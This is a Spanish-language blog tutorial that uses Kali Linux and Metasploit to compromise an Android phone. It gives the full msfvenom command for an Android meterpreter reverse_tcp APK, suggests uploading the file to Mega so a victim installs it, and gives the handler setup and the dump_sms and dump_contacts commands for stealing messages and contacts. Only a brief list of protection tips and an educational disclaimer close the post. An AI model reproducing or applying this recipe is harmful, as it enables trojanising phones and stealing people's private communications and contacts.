Вы находитесь на странице: 1из 30

Sin duda el Smartphone lo tenemos en el día a día, de hecho se podría decir que hasta nos hemos

hecho dependientes del mismo.

Esta es una de las cosas que los Hackers de Sombrero Negro (Llamados Crackers) lo saben y lo
entienden muy bien, por eso es necesario saber qué hacer para cuidarnos de ataques de los mismos, la
mejor forma de aprender a defenderse es saber cómo actúan, como piensan sus fechorías.

En este Blog iremos aprendiendo solo un poco de lo que los Crackers pueden realizar a desprevenidos
consumidores e iremos aprendiendo cómo evitar caer en sus trampas.

A continuación veremos que con Kali Linux una distribución basada en Debian GNU/Linux, se puede
acceder a los Smartphones de las personas, en este caso a un Smartphone Android.

1. Encender Kali Linux en una máquina Virtual o en tu PC.

Podemos utilizar una máquina virtual como VirtualBox o bien bootear una memoria usb y ubicarle la
imagen ISO de Kali Linux.
2. Abrir una Consola de Kali Linux.

Para esto podemos irnos al icono negro de consola en la parte izquierda como muestra la Imagen.
3. Elegimos método y Payload.

Aquí estaremos eligiendo cuál es el Payload que usaremos para realizar el ataque con Metasploit, en
este caso utilizaremos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000

msfvenom: Indicará que utilizaremos Metasploit para el ataque.

-p: Indica a msfvenom que utilizaremos un payload.

android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una conexión reversa, esto


quiere decir que es el dispositivo vícima el que abrirá con nosotros una sesión en Meterpreter.

lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que nos da el Router
para identificarnos dentro del host.

lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos normalmente usados
como 80,4444, ya que puede estar siendo utilizado.
Para saber cual es la ip que ubicaremos en lhost podemos abrir otra terminal y ubicar el comando:

ifconfig
4. Elegimos la ruta del "Virus".

En este caso lo ubicaremos en el Escritorio con:

R > /root/Desktop/Nombredelarchivo.apk

Muchas veces dependiendo del idioma del Kali Linux, la ruta puede cambiar, por ejemplo, en lugar de
ubicar "Desktop" se debe ubicar "Escritorio". De esta forma tendremos completo el comando que
debemos ejecutar:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R >


/root/Desktop/AplicacionVirus.apk
5. Ejecutar.

Presionar ENTER para crear el archivo APK, este quedará obviamente en la carpeta que hayamos
tecleado. Como muestra a continuación el archivo está en Escritorio.
6. Subimos el archivo.

Podemos subir el archivo a la nube, o a alguna página de descargas, en este caso lo subí a Mega, de
aquí se trata de hacer que la víctima se descargue el apk que hemos creado y la ejecute, pero eso será
luego.
7. Abrir la consola Metasploit.

Para eso utilizaremos el comando:

msfconsole
De esta manera tendremos la consola abierta.

8. Usar el Handler y preparar Exploit.

Abrimos el Handler de escucha, esto esperará que la victima se conecte a nosotros, para eso usamos el
comando:

use exploit/multi/handler
9. Set los parámetros que va a escuchar el Handler.

En este caso vamos a ubicarle los parámetros que el Handler en Metasploit estará esperando
(Escuchando), por tanto daremos los parámetros que ubicamos en el archivo virus que creamos
anteriormente.

Los comandos son los siguientes:

set PAYLOAD android/meterpreter/reverse_tcp

set lhost 192.168.1.2

set lport 7000

Y luego comprobamos que todo esté bien tecleado con el comando:

show options

Se guian con la imagen que sigue.


10. Iniciar el Exploit.

Para eso usamos el comando:

exploit

De esta manera estaremos en escucha y espera a que nuestra víctima abra la aplicación maliciosa.
11. Obtener contactos y mensajes del smartphone.

Cuando el Smartphone abra la aplicación (Obviamente tú y el Smartphone tienen que tener conexión
a Internet y estar dentro de la misma red LAN), se mostrará que se a abierto una sesión en Meterpreter.
Ahora con los comandos siguientes podremos obtener un archivo text de los mensajes y de los
contactos del smartphone.

dump_sms

dump_contacts
Entonces al realizar los comando obtendremos archivos text que se guardaran en la carpeta Home del
sistema (A esta se accede directamente del escritorio dando click en el icono de carpeta al lado
derecho). Estos archivos contendrán los mensajes de texto enviados y recibidos del smartphone víctima
así como sus contactos personales.
12. Salir de consolas.
Ahora puedes salir de las consolas, bien cerrando sesión con exit o cerrando la ventana del Metasploit,
o explorar otras opciones.

Terminado!

Ahora ya sabes como los que usan Kali Linux pueden realizar este tipo de ataques y obtener tu
información, por lo tanto la pregunta:
¿Cómo nos podemos proteger de estos ataques?

* No descargar aplicaciones dudosas.

* No instalar aplicaciones de sitios de dudosa reputación.

* Leer atentamente los permisos que se le dan a las aplicaciones.

* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

IMPORTANTE!
* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado
a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.

* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines
educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas,
cometer un delito es muy grave, por favor evítalo.

* Las imágenes han sido de elaboración propia.

- Cuculmeca

Вам также может понравиться